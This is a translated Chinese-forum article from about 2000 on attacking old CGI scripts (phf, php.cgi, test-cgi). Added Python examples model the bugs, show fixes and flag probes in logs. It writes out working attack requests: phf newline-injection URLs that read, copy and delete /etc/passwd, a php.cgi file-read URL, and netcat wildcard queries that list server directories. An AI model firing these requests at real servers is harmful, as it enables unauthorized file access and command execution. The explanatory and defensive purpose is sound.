Sender: iamu()
Compiled by: williamlong (2000-03-07 19:00:17), on-site mail
Exploiting CGI Vulnerabilities (Part 1)
CGI vulnerabilities have always been an easily overlooked problem, and at the same time a widespread one; not long ago the hacker who broke into the PCWEEK Linux server exploited a CGI vulnerability. I will write about some CGI-based attack methods, drawing on the CGI vulnerabilities I know of and those I have seen on foreign sites. My knowledge is limited, so if anything here is wrong please write to me: [email protected]
1. phf.cgi attack:
phf is familiar to everyone. It was originally meant to update a PHONEBOOK (it is a form front end for the ph client), but many administrators did not understand it, and so it became a vulnerability. The actual cause is that phf builds a command line from the form fields and hands it to a shell through popen(); its escape_shell_cmd() routine backslash-escapes the usual shell metacharacters but not the newline, so an encoded newline (%0a) ends the intended ph command and whatever follows is executed as a second command. Enter in the browser:
http://thegnome.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
and the passwd file is displayed. Other commands work just as well:
http://thegnome.com/cgi-bin/phf?%0aid&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=
http://thegnome.com/cgi-bin/phf?%0als%20-la%20%7Esomeuser&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=
http://thegnome.com/cgi-bin/phf?%0acp%20/etc/passwd%20%7Esomeuser/passwd%0A&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=
http://thegnome.com/~someuser/passwd
http://thegnome.com/cgi-bin/phf?%0arm%20%7Esomeuser/passwd&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=
The requests above are equivalent to running these commands on the server:
id
ls -la ~someuser
cp /etc/passwd ~someuser/passwd
(copy passwd into a user's web-readable directory so it can be fetched as an ordinary page, which is what the plain http://thegnome.com/~someuser/passwd request does)
rm ~someuser/passwd
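To make the mechanism concrete, here is an added example that models the phf bug in Python. It is not phf.c and not part of the original article: it ports the idea of the escape routine with the newline left out of the escaped set, builds the command string the CGI would hand to popen(), and beside it shows the hardened form, which passes the field as one argv element so that no shell ever parses it. The ph path, the field handling (only the Qalias field is used) and the sample queries are assumptions.

```python
# Added example, not phf.c: a small model of the phf newline bug.
# The metacharacters below are the ones the CGI's escape routine
# backslash-escaped before popen(); the newline is missing from the set,
# and /bin/sh treats an unescaped newline as a command separator.
# Assumptions: the ph path, and that only the Qalias field is used.
from urllib.parse import parse_qs

PH = '/usr/local/bin/ph'
# Escaped by the vulnerable routine; note that '\n' and '\r' are absent.
ESCAPED = set('&;`\'"|*?~<>^()[]{}$\\')


def escape_shell_cmd(value: str, escaped: set = ESCAPED) -> str:
    """Backslash-escape the characters in `escaped`; everything else passes through."""
    return ''.join('\\' + c if c in escaped else c for c in value)


def qalias(query: str) -> str:
    """Decoded value of the Qalias form field (%0a -> newline, %20 -> space)."""
    return parse_qs(query, keep_blank_values=True).get('Qalias', [''])[0]


def phf_shell_command(query: str) -> str:
    """Vulnerable path: the string the CGI builds and hands to popen(), i.e. to /bin/sh -c."""
    return PH + ' -m alias=' + escape_shell_cmd(qalias(query))


def commands_the_shell_runs(command: str) -> list:
    """Split the way /bin/sh does: an unescaped newline ends one command and starts the next."""
    return [part for part in command.split('\n') if part.strip()]


def phf_argv(query: str) -> list:
    """Hardened path: no shell at all. The field is a single argv element, so a newline
    inside it is plain data for ph and can never start a second command."""
    return [PH, '-m', 'alias=' + qalias(query)]


if __name__ == '__main__':
    for q in ('Qalias=x%0a/bin/cat%20/etc/passwd',   # newline: breaks out
              'Qalias=x%3b/bin/cat%20/etc/passwd'):  # semicolon: escaped, stays one command
        print(q)
        print('  vulnerable ->', commands_the_shell_runs(phf_shell_command(q)))
        print('  hardened   ->', phf_argv(q))
```

The second query in the demo is why the attack uses %0a and not a semicolon: the semicolon is on the escaped list and comes out as a harmless "\;", while the newline passes through untouched. The hardened version does not try to extend the blacklist; it removes the shell from the path entirely.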
2. php.cgi
Besides PHF, php is another common vulnerability. php.cgi 2.0beta10 and earlier let anyone read system files with the privileges of the user the HTTP server runs as. Enter in the browser:
http://boogered.system.com/cgi-bin/php.cgi?/etc/passwd
and the requested file is displayed.
In addition, some php.cgi versions can be made to run a shell: the program copies up to 8k bytes into a 128-byte buffer, which overflows the stack and lets an attacker execute code as the HTTP server user.
This only works when PHP runs as a CGI program; it does not work when PHP runs as an Apache module. To check whether a target can be attacked, enter in the browser:
http://hostname/cgi-bin/php.cgi
If the response shows something like the following, it can be attacked:
PHP/FI Version 2.0b10
...
3. The test-cgi problem
test-cgi is another frequently found vulnerability. Enter in the browser:
http://thegnome.com/cgi-bin/test-cgi?\whatever
It will return:
CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME = thegnome.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,
text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST = fifth.column.gov
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
Now try once more, entering this:
http://thegnome.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd
Did you get the passwd file? Do not count on it. The stock test-cgi is a plain /bin/sh script that only echoes its environment; the value of QUERY_STRING is expanded as a variable, never re-parsed as a command, so a newline in the query does not run a second command the way it does with phf. What test-cgi really leaks comes from the unquoted variable in its echo line, which the next requests show.
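An added example, not NCSA's test-cgi script and not part of the original article: it runs the one echo line that matters from a test-cgi style script under /bin/sh in a throwaway directory (the file names are constructed), first with the variable unquoted as shipped and then quoted, so you can see exactly what a wildcard query leaks and that a newline in the query is only echoed, never executed.

```python
# Added example, not NCSA's test-cgi. The shipped script was /bin/sh with the line
#     echo QUERY_STRING = $QUERY_STRING
# Unquoted, so the shell glob-expands wildcards in the query against the current
# directory (cgi-bin), which is why "?*" lists cgi-bin and "?/*" lists /.
import os
import subprocess
import tempfile

# Constructed stand-in for a cgi-bin directory (names only, empty files).
SAMPLE_FILES = ['cgi-lib.pl', 'phf', 'test-cgi']

VULNERABLE_LINE = 'echo QUERY_STRING = $QUERY_STRING'    # as shipped: expanded
FIXED_LINE = 'echo QUERY_STRING = "$QUERY_STRING"'       # quoted: printed literally


def run_report_line(query: str, script_line: str) -> str:
    """Run one test-cgi style echo line under /bin/sh with QUERY_STRING set,
    inside a temporary directory holding SAMPLE_FILES; return what it printed."""
    with tempfile.TemporaryDirectory() as cgi_bin:
        for name in SAMPLE_FILES:
            open(os.path.join(cgi_bin, name), 'w').close()
        # LC_ALL=C makes the glob order predictable.
        env = dict(os.environ, QUERY_STRING=query, LC_ALL='C')
        result = subprocess.run(['/bin/sh', '-c', script_line], cwd=cgi_bin,
                                env=env, capture_output=True, text=True, check=True)
    return result.stdout.rstrip('\n')


def names_leaked(query: str) -> list:
    """File names the unquoted line reveals for `query` (the listing seen in the report)."""
    return run_report_line(query, VULNERABLE_LINE).split('=', 1)[1].split()


if __name__ == '__main__':
    print(run_report_line('*', VULNERABLE_LINE))   # lists the constructed cgi-bin
    print(run_report_line('*', FIXED_LINE))        # prints the literal *
    # A newline in the query is word-split and echoed, never executed:
    print(run_report_line('\nhelp\n/bin/cat /etc/passwd', VULNERABLE_LINE))
```

The third call is the check for the "did you get passwd?" question: the shell splits the value on the newline and echo prints the pieces as words; nothing is run. The fix is one pair of double quotes, or better, removing a script that exists only to print the server's environment.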
Attacking port 80 with netcat:
machine% echo "GET /cgi-bin/test-cgi?/*" | nc removed.name.com 80
This returns:
CGI/1.0 test script report:
argc is 1. argv is /\*.
SERVER_SOFTWARE = NCSA/1.4.1
SERVER_NAME = removed.name.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = /a /bin /boot /bsd /cdrom /dev /etc /home /lib /mnt
/root /sbin /stand /sys /tmp /usr /usr2 /var
REMOTE_HOST = remote.machine.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
It listed the root directory! Now try this:
machine% echo "GET /cgi-bin/test-cgi?*" | nc removed.name.com 80
This returns:
CGI/1.0 test script report:
argc is 1. argv is \*.
SERVER_SOFTWARE = NCSA/1.4.1
SERVER_NAME = removed.name.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = calendar cgi-archie cgi-calendar cgi-date cgi-finger
cgi-fortune cgi-lib.pl imagemap imagemap.cgi imagemap.conf index.html
mail-query mail-query-2 majordomo majordomo.cf marker.cgi
menu message.cgi munger.cgi munger.note ncsa-default.tar post-query
query smartlist.cf src subscribe.cf test-cgi uptime
REMOTE_HOST = remote.machine.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
That listed the contents of /cgi-bin/. The whole bug is that the script's line "echo QUERY_STRING = $QUERY_STRING" leaves the variable unquoted, so the shell expands any wildcard in the query against the script's current directory (cgi-bin) or, with a leading slash, against the root. Quoting the variable stops the expansion; deleting test-cgi, which only exists to print the server's environment, is the better fix.
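For the defender's side, an added example that is not from the original article: it checks web server access logs for exactly the three probes described above. The log lines are constructed, in Common Log Format, and the rules are assumptions about what an attacker's request looks like: a decoded newline in a phf query, an absolute path as the php.cgi query, and a shell wildcard in a test-cgi query.

```python
# Added example, not from the original article: flag the three classic CGI probes
# in web server access logs. The sample lines and the rules are constructed assumptions.
import re
from urllib.parse import unquote

# Common Log Format; the protocol is optional because an HTTP/0.9 request such as
# the netcat "GET /cgi-bin/test-cgi?*" above is logged without one.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>[^"]+))?" (?P<status>\d{3})')

# Constructed sample log (not from a real server).
SAMPLE_LOG = """\
200.200.200.200 - - [07/Mar/2000:19:00:17 +0800] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1234
200.200.200.200 - - [07/Mar/2000:19:00:18 +0800] "GET /cgi-bin/php.cgi?/etc/passwd HTTP/1.0" 200 987
200.200.200.200 - - [07/Mar/2000:19:00:19 +0800] "GET /cgi-bin/test-cgi?*" 200 640
10.0.0.5 - - [07/Mar/2000:19:01:00 +0800] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 512
10.0.0.6 - - [07/Mar/2000:19:01:05 +0800] "GET /index.html HTTP/1.0" 200 2048
"""


def classify_target(target: str):
    """Return a reason string if the request target matches one of the probes, else None."""
    path, _, query = target.partition('?')
    script = path.rsplit('/', 1)[-1]
    q = unquote(query)                      # %0a -> newline, %2a -> *, and so on
    if script == 'phf' and ('\n' in q or '\r' in q):
        return 'phf: newline in query (command injection)'
    if script == 'php.cgi' and q.startswith('/'):
        return 'php.cgi: absolute path as query (file read)'
    if script == 'test-cgi' and any(c in q for c in '*?['):
        return 'test-cgi: shell wildcard in query (glob listing)'
    return None


def find_cgi_probes(log_text: str) -> list:
    """(client ip, request target, reason) for every log line that matches a probe."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        reason = classify_target(m['target'])
        if reason:
            hits.append((m['ip'], m['target'], reason))
    return hits


if __name__ == '__main__':
    for ip, target, reason in find_cgi_probes(SAMPLE_LOG):
        print(ip, target, '->', reason)
```

The query is percent-decoded before matching so that %0A, %0a and %2A are all caught; the legitimate phf lookup for "smith" in the sample is left alone because it carries no newline.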
———————————————————————————————————————————
The above article was translated by darksun member ISNO; if you repost it, please keep the article intact. http://isno.yeah.net
-- =====================================================
Hacker = security?? http://isno.yeah.net
=====================================================
※ Source: Moon Software Station http://www.moon-soft.com [FROM: 202.99.62.155]